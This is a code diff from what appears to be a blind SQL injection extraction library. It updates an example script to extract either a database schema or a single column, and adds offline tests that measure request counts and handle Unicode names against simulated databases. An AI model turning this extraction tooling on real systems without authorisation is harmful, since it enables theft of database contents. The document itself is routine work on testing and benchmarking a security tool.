_, dbms_type, table, column = sys.argv argv = sys.argv + [None, None]
_, dbms_type, table, column = argv[:4]
allowed = ['sqlite', 'mysql'] allowed = ['sqlite', 'mysql']
assert dbms_type in allowed, f'dbms must be in {allowed}' assert dbms_type in allowed, f'dbms must be in {allowed}'
@ -39,10 +43,12 @@ def main():
dbms = SQLite() if dbms_type == 'sqlite' else MySQL() dbms = SQLite() if dbms_type == 'sqlite' else MySQL()
ext = Extractor(requester, dbms) ext = Extractor(requester, dbms)
res = ext.extract_schema(metadata=True) if table is None:
print(json.dumps(res, indent=4)) res = ext.extract_schema(strategy='model', metadata=True)
res = ext.extract_column(table, column) print(json.dumps(res, indent=4))
print(json.dumps(res, indent=4)) else:
res = ext.extract_column(table, column)
print(json.dumps(res, indent=4))

@ -0,0 +1,29 @@
import json
import logging
from hakuin.dbms import SQLite
from hakuin import Extractor
from OfflineRequester import OfflineRequester
logging.basicConfig(level=logging.INFO)
def main():
requester = OfflineRequester(db='large_content')
ext = Extractor(requester=requester, dbms=SQLite())
res = ext.extract_schema(metadata=True)
print(json.dumps(res, indent=4))
res_len = sum([len(table) for table in res])
res_len += sum([len(column) for table, columns in res.items() for column in columns])
print('Total requests:', requester.n_queries)
print('Average RPC:', requester.n_queries / res_len)
if __name__ == '__main__':
main()

28
tests/test_unicode.py Normal file

@ -0,0 +1,28 @@
import json
import logging
import hakuin
from hakuin import Extractor
from hakuin.dbms import SQLite
from OfflineRequester import OfflineRequester
logging.basicConfig(level=logging.INFO)
def main():
requester = OfflineRequester(db='unicode', verbose=False)
ext = Extractor(requester=requester, dbms=SQLite())
res = ext.extract_schema(strategy='binary')
print(res)
res = ext.extract_column('Ħ€ȽȽ©', 'ŴǑȒȽƉ')
if __name__ == '__main__':
main()